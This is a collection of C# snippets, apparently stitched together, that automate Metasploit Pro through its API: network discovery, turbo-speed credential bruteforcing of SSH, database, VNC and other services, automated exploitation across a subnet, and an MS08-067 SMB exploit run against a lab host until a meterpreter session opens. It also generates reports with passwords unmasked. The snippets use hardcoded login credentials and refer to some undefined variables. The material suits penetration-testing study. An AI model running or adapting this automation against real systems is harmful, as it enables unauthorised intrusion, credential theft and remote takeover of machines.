public static void Main(string[] args)
{
using (MetasploitSession session = new MetasploitSession("metasploit", "2c8X|a2!", "https://192.168.1.148:3790/api/1.1"))
{
using (MetasploitProManager manager = new MetasploitProManager(session))
{
// {
// "workspace" => "Project1",
// "DS_WHITELIST_HOSTS" => "192.168.0.0/24",
// "DS_MinimumRank" => "great",
// "DS_EXPLOIT_SPEED" => 5,
// "DS_EXPLOIT_TIMEOUT" => 2,
// "DS_LimitSessions" => true,
// "DS_MATCH_VULNS" => true,
// "DS_MATCH_PORTS" => true
// }
Dictionary<string, object> options = new Dictionary<string, object>();
options.Add("workspace", "default");
options.Add("DS_WHITELIST", "192.168.1.0/24");
options.Add("DS_MinimumRank", "great");
options.Add("DS_EXPLOIT_SPEED", 5);
options.Add("DS_EXPLOIT_TIMEOUT", 2);
options.Add("DS_LimitSessions", true);
options.Add("DS_MATCH_VULNS", true);
options.Add("DS_MATCH_PORTS", true);
Dictionary<string, object> response = manager.StartExploit(options);
foreach (var pair in response)
Console.WriteLine(pair.Key + ": " + pair.Value);
}
}
}
public static void Main(string[] args)
{
using (MetasploitSession session = new MetasploitSession("metasploit", "2c8X|a2!", "https://192.168.1.148:3790/api/1.1"))
{
using (MetasploitProManager manager = new MetasploitProManager(session))
{
Dictionary<object, object> options = new Dictionary<object, object>();
options.Add("workspace", "default");
options.Add("DS_PATH", "/tmp/efc63839-ae8d-4caf-92f5-3f3ff7b6e306");
Dictionary<object, object> response = manager.StartImport(options);
foreach (var pair in response)
Console.WriteLine(pair.Key + ": " + pair.Value);
response = manager.GetProTaskStatus(response["task_id"] as string);
foreach (var pair in response)
{
string stat = (pair.Value as Dictionary<object, object>)[(object)"status"] as string;
while (stat == "running")
{
System.Threading.Thread.Sleep(500);
response = manager.GetProTaskStatus(response["task_id"] as string);
foreach (var p in response)
stat = (p.Value as Dictionary<object, object>)["status"] as string;
}
}
}
}
}
public static void Main(string[] args)
{
using (MetasploitSession session = new MetasploitSession("metasploit", "2c8X|a2!", "https://192.168.1.148:3790/api/1.1"))
{
using (MetasploitProManager manager = new MetasploitProManager(session))
{
string workspace = Guid.NewGuid().ToString();
Dictionary<object, object> options = new Dictionary<object, object>();
options.Add("name", workspace);
Dictionary<object, object> response = manager.AddProProject(options);
foreach (var pair in response)
Console.WriteLine(pair.Key + ": " + pair.Value);
response = manager.DeleteProWorkspace(workspace);
foreach (var pair in response)
Console.WriteLine(pair.Key + ": " + pair.Value);
response = manager.CreateConsole();
workspace = Guid.NewGuid().ToString();
string consoleID = response["id"] as string;
response = manager.WriteToConsole(consoleID, "workspace -a " + workspace + "\n");
response = manager.WriteToConsole(consoleID, "workspace\n");
response = manager.WriteToConsole(consoleID, "workspace -d " + workspace + "\n");
response = manager.ReadConsole(consoleID);
foreach (var pair in response)
Console.WriteLine(pair.Key + ": " + pair.Value);
manager.DestroyConsole(consoleID);
}
}
}
public static void Main(string[] args)
{
using (MetasploitSession session = new MetasploitSession("msfuser", "msfpass", "https://127.0.0.1:55553/"))
{
using (MetasploitProManager manager = new MetasploitProManager(session))
{
Dictionary<string, object> modules = manager.GetCoreModuleStats();
Console.WriteLine("Module stats:");
foreach (var pair in modules)
Console.WriteLine(pair.Key + ": " + pair.Value);
Dictionary<string, object> version = manager.GetCoreVersionInformation();
Console.WriteLine("\n\nVersion information:");
foreach (KeyValuePair<string, object> pair in version)
Console.WriteLine(pair.Key + ": " + pair.Value);
Console.WriteLine("\n\nCreating console...");
Dictionary<string, object> consoleResponse = manager.CreateConsole();
foreach (KeyValuePair<string, object> pair in consoleResponse)
Console.WriteLine(pair.Key + ": " + pair.Value);
string consoleID = consoleResponse["id"] as string;
Console.WriteLine("\n\nConsole created, getting list of consoles...");
Dictionary<string, object> consoleList = manager.ListConsoles();
foreach (KeyValuePair<string, object> pair in consoleList)
{
Console.WriteLine("\n" + pair.Key + ":");
foreach (object obj in (pair.Value as IList<object>))
{
//each obj is a Dictionary<string, object> in this response
foreach (KeyValuePair<string, object> p in obj as Dictionary<string, object>)
{
Console.WriteLine(p.Key + ": " + p.Value);
}
}
}
Console.WriteLine("\n\nDestroying our console: " + consoleID);
Dictionary<string, object> destroyResponse = manager.DestroyConsole(consoleID);
foreach (KeyValuePair<string, object> pair in destroyResponse)
Console.WriteLine(pair.Key + ": " + pair.Value);
if (destroyResponse.ContainsKey("result") && ((string)destroyResponse["result"]) == "success")
Console.WriteLine("Destroyed.");
else
Console.WriteLine("Failed!");
Dictionary<string, object> proVersion = manager.AboutPro();
Console.WriteLine("\n\nInformation about pro:");
foreach (KeyValuePair<string, object> pair in proVersion)
Console.WriteLine(pair.Key + ": " + pair.Value);
Dictionary<string, object> updateStatus = manager.ProUpdateStatus();
Console.WriteLine("\n\nUpdate status:");
foreach(KeyValuePair<string, object> pair in updateStatus)
Console.WriteLine(pair.Key + ": " + pair.Value);
}
}
}
public static void Main(string[] args)
{
using (MetasploitSession session = new MetasploitSession("metasploit", "2c8X|a2!", "https://192.168.1.148:3790/api/1.1"))
{
if (string.IsNullOrEmpty(session.Token))
throw new Exception("Login failed. Check credentials");
using (MetasploitProManager manager = new MetasploitProManager(session))
{
// Dictionary<object, object> options = new Dictionary<object, object>();
// options.Add("RHOST", "192.168.1.129");
// options.Add("RPORT", "445");
// options.Add("LPORT", new Random().Next(1001, 50000));
//
// Dictionary<object, object> response = manager.ExecuteModule("exploit", "windows/smb/ms08_067_netapi", options);
//
// foreach (KeyValuePair<object, object> pair in response)
// Console.WriteLine(pair.Key + ": " + pair.Value);
var response = manager.CreateConsole();
foreach (var pair in response)
Console.WriteLine(pair.Key + ": " + pair.Value);
string consoleID = response["id"] as string;
Console.WriteLine("Setting up options...");
response = manager.WriteToConsole(consoleID, "use exploit/windows/smb/ms08_067_netapi\n");
System.Threading.Thread.Sleep(6000);
response = manager.WriteToConsole(consoleID, "set RHOST 192.168.1.129\n");
System.Threading.Thread.Sleep(6000);
response = manager.WriteToConsole(consoleID, "set LPORT " + new Random().Next(1001, 50000) + "\n");
System.Threading.Thread.Sleep(6000);
Console.WriteLine("Exploiting...");
response = manager.WriteToConsole(consoleID, "exploit\n");
System.Threading.Thread.Sleep(12000);
bool busy = true;
while (busy)
{
response = manager.ReadConsole(consoleID);
foreach (var pair in response)
Console.WriteLine(pair.Key + ": " + pair.Value);
busy = bool.Parse(response["busy"].ToString());
if ((response["prompt"] as string).Contains("meterpreter"))
break;
}
response = manager.ListSessions();
foreach (var pair in response)
foreach (var p in pair.Value as Dictionary<object, object>)
Console.WriteLine(p.Key + ": " + p.Value);
manager.DestroyConsole(consoleID);
}
}
}
private bool MetasploitProAssessmentIsRunning(string msfProScanID)
{
using (MetasploitSession session = new MetasploitSession(this.Configuration["metasploitUser"],
this.Configuration["metasploitPass"],
"https://" + this.Configuration["metasploitHost"]+ ":3790/api/1.1")) {
using (MetasploitProManager manager = new MetasploitProManager(session)) {
Dictionary<string, object> response = manager.GetProTaskStatus (msfProScanID);
if (response.ContainsKey ("error"))
throw new Exception (response ["error_message"] as string);
string status = (response.First ().Value as Dictionary<string, object>) ["status"] as string;
if (status == "running")
return true;
else
return false;
}
}
}
private bool ImportFileIntoMetasploitPro(string filename, string workspace)
{
using (MetasploitSession session = new MetasploitSession(this.Configuration["metasploitUser"],
this.Configuration["metasploitPass"],
"https://"+this.Configuration["metasploitHost"]+":3790/api/1.1")) {
using (MetasploitProManager manager = new MetasploitProManager(session)) {
Dictionary<string, object> options = new Dictionary<string, object> ();
options.Add ("workspace", workspace);
options.Add ("DS_PATH", filename);
options.Add ("preserve_hosts", true);
Dictionary<string, object> response = manager.StartImport (options);
foreach (var pair in response)
Console.WriteLine (pair.Key + ": " + pair.Value);
Dictionary<string, object> taskResponse = manager.GetProTaskStatus (response ["task_id"] as string);
taskResponse = taskResponse.First ().Value as Dictionary<string, object>;
while (taskResponse["status"] as string == "running") {
Console.WriteLine ("Waiting on file import: " + filename);
Thread.Sleep (new TimeSpan (0, 0, 60));
taskResponse = manager.GetProTaskStatus (response ["task_id"] as string);
taskResponse = taskResponse.First ().Value as Dictionary<string, object>;
}
return true;
}
}
}
private XmlNode GetMetasploitProReport(string workspace)
{
Console.WriteLine ("Generating report for workspace: " + workspace);
string taskID = string.Empty;
using (MetasploitSession session = new MetasploitSession(this.Configuration["metasploitUser"],
this.Configuration["metasploitPass"],
"https://"+this.Configuration["metasploitHost"]+":3790/api/1.1")) {
using (MetasploitProManager manager = new MetasploitProManager(session)) {
Dictionary<string, object> options = new Dictionary<string, object> ();
options.Add ("DS_WHITELIST_HOSTS", string.Empty);
options.Add ("DS_BLACKLIST_HOSTS", string.Empty);
options.Add ("workspace", workspace);
options.Add ("DS_MaskPasswords", false);
options.Add ("DS_IncludeTaskLog", false);
options.Add ("DS_JasperDisplaySession", true);
options.Add ("DS_JasperDisplayCharts", true);
options.Add ("DS_LootExcludeScreenshots", false);
options.Add ("DS_LootExcludePasswords", false);
options.Add ("DS_JasperTemplate", "msfxv3.jrxml");
options.Add ("DS_REPORT_TYPE", "XML");
options.Add ("DS_UseJasper", true);
options.Add ("DS_UseCustomReporting", true);
options.Add ("DS_JasperProductName", "AutoAssess");
options.Add ("DS_JasperDbEnv", "production");
options.Add ("DS_JasperLogo", string.Empty);
options.Add ("DS_JasperDisplaySections", "1,2,3,4,5,6,7,8");
options.Add ("DS_EnabelPCIReport", true);
options.Add ("DS_EnableFISMAReport", true);
options.Add ("DS_JasperDisplayWeb", true);
Dictionary<string, object> response = manager.StartReport (options);
Dictionary<string, object> taskResponse = manager.GetProTaskStatus (response ["task_id"] as string);
taskResponse = taskResponse.First ().Value as Dictionary<string, object>;
while (taskResponse["status"] as string == "running") {
Console.WriteLine ("Waiting on metasploit report");
Thread.Sleep (new TimeSpan (0, 0, 60));
taskResponse = manager.GetProTaskStatus (response ["task_id"] as string);
taskResponse = taskResponse.First ().Value as Dictionary<string, object>;
}
response = manager.DownloadReportByTask (response ["task_id"] as string);
taskID = response["data"] as string;
}
}
XmlDocument doc = new XmlDocument();
doc.LoadXml(taskID);
return doc.LastChild;
}
private void CreateNewMetasploitWorkspace(string workspace)
{
using (MetasploitSession session = new MetasploitSession(this.Configuration["metasploitUser"],
this.Configuration["metasploitPass"],
"https://" + this.Configuration["metasploitHost"] + ":3790/api/1.1")) {
using (MetasploitProManager manager = new MetasploitProManager(session)) {
// Dictionary<object, object> options = new Dictionary<object, object>();
// options.Add("name", workspace);
//
// manager.AddProWorkspace(options);
Dictionary<string, object> response = manager.CreateConsole ();
string consoleID = response ["id"] as string;
manager.WriteToConsole (consoleID, "workspace -a \"" + workspace + "\"\n");
Thread.Sleep (new TimeSpan (0, 0, 30));
manager.WriteToConsole (consoleID, "workspace \n");
manager.DestroyConsole (consoleID);
}
}
}
private string BeginMetasploitProAssessment(string workspace, string whitelist, bool bruteforce)
{
using (MetasploitSession session = new MetasploitSession(this.Configuration["metasploitUser"],
this.Configuration["metasploitPass"],
"https://"+this.Configuration["metasploitHost"]+":3790/api/1.1")) {
using (MetasploitProManager manager = new MetasploitProManager(session)) {
Dictionary<string, object> options = new Dictionary<string, object> ();
Dictionary<string, object> response;
object hosts = csv.Split (',');
options.Add ("ips", hosts);
options.Add ("workspace", workspace);
Console.WriteLine ("Discovering...");
response = manager.StartDiscover (options);
Dictionary<string, object> taskResponse = manager.GetProTaskStatus (response ["task_id"] as string);
taskResponse = taskResponse.First ().Value as Dictionary<string, object>;
while (taskResponse["status"] as string == "running") {
Console.WriteLine ("Waiting on metasploit discovery");
Thread.Sleep (new TimeSpan (0, 0, 60));
taskResponse = manager.GetProTaskStatus (response ["task_id"] as string);
taskResponse = taskResponse.First ().Value as Dictionary<string, object>;
}
options = new Dictionary<string, object> ();
if (true) {//if (bruteforce)
string svcs = string.Empty;
foreach (string service in services) {
if (service == "postgresql")
svcs = svcs + "Postgresql ";
else if (service == "mysql")
svcs = svcs + "MySQL ";
else if (service == "mssql")
svcs = svcs + "MSSQL ";
else if (service == "oracle")
svcs = svcs + "Oracle ";
else if (service == "http")
svcs = svcs + "HTTP ";
else if (service == "https")
svcs = svcs + "HTTPS ";
else if (service == "ssh")
svcs = svcs + "SSH ";
else if (service == "telnet")
svcs = svcs + "Telnet ";
else if (service == "ftp")
svcs = svcs + "FTP ";
else if (service == "exec")
svcs = svcs + "EXEC ";
else if (service == "shell")
svcs = svcs + "SHELL ";
else if (service == "vnc")
svcs = svcs + "VNC ";
}
Console.WriteLine ("Bruteforcing...");
options.Add ("workspace", workspace);
options.Add ("DS_WHITELIST_HOSTS", whitelist);
options.Add ("DS_BRUTEFORCE_SCOPE", "quick");
options.Add ("DS_BRUTEFORCE_SERVICES", svcs);
options.Add ("DS_BRUTEFORCE_SPEED", "TURBO");
options.Add ("DS_INCLUDE_KNOWN", true);
options.Add ("DS_BRUTEFORCE_GETSESSION", true);
response = manager.StartBruteforce (options);
taskResponse = manager.GetProTaskStatus (response ["task_id"] as string);
taskResponse = taskResponse.First ().Value as Dictionary<string, object>;
while (taskResponse["status"] as string == "running") {
Console.WriteLine ("Waiting on metasploit bruteforce");
Thread.Sleep (new TimeSpan (0, 0, 30));
taskResponse = manager.GetProTaskStatus (response ["task_id"] as string);
taskResponse = taskResponse.First ().Value as Dictionary<string, object>;
}
options = new Dictionary<string, object> ();
}
options.Add ("workspace", workspace);
options.Add ("DS_WHITELIST", whitelist);
options.Add ("DS_MinimumRank", "great");
options.Add ("DS_EXPLOIT_SPEED", 5);
options.Add ("DS_EXPLOIT_TIMEOUT", 2);
options.Add ("DS_LimitSessions", false);
options.Add ("DS_MATCH_VULNS", true);
options.Add ("DS_MATCH_PORTS", true);
response = manager.StartExploit (options);
foreach (var pair in response)
Console.WriteLine (pair.Key + ": " + pair.Value);
return response ["task_id"] as string;
}
}
}
public static void Main(string[] args)
{
using (MetasploitSession session = new MetasploitSession("metasploit", "2c8X|a2!", "https://192.168.1.148:3790/api/1.1"))
{
using (MetasploitProManager manager = new MetasploitProManager(session))
{
Dictionary<string, object> options = new Dictionary<string, object>();
options.Add("DS_WHITELIST_HOSTS", string.Empty);
options.Add("DS_BLACKLIST_HOSTS", string.Empty);
options.Add("workspace", "default");
options.Add("DS_MaskPasswords", false);
options.Add("DS_IncludeTaskLog", false);
options.Add("DS_JasperDisplaySession", true);
options.Add("DS_JasperDisplayCharts", true);
options.Add("DS_LootExcludeScreenshots", false);
options.Add("DS_LootExcludePasswords", false);
options.Add("DS_JasperTemplate", "msfxv3.jrxml");
options.Add("DS_REPORT_TYPE", "PDF");
options.Add("DS_UseJasper", true);
options.Add("DS_UseCustomReporting", true);
options.Add("DS_JasperProductName", "AutoAssess");
options.Add("DS_JasperDbEnv", "production");
options.Add("DS_JasperLogo", string.Empty);
options.Add("DS_JasperDisplaySections", "1,2,3,4,5,6,7,8");
options.Add("DS_EnabelPCIReport", true);
options.Add("DS_EnableFISMAReport", true);
options.Add("DS_JasperDIsplayWeb", true);
Dictionary<string, object> response = manager.StartReport(options);
foreach (var pair in response)
Console.WriteLine(pair.Key + ": " + pair.Value);
string taskID = response["task_id"] as string;
response = manager.GetProTaskStatus(taskID);
bool done = false;
while (!done)
{
System.Text.Encoding enc = System.Text.Encoding.ASCII;
string status = string.Empty;
foreach (var pair in response)
{
Console.WriteLine(pair.Key + ":");
foreach (var p in pair.Value as Dictionary<string, object>)
Console.WriteLine(p.Key + ": " + p.Value);
status = (pair.Value as Dictionary<string, object>)["status"] as string;
}
if (status != "running")
{
done = true;
Console.WriteLine("Done!");
}
else
{
response = manager.GetProTaskStatus(taskID);
Console.WriteLine("Not done yet...");
}
}
}
}
}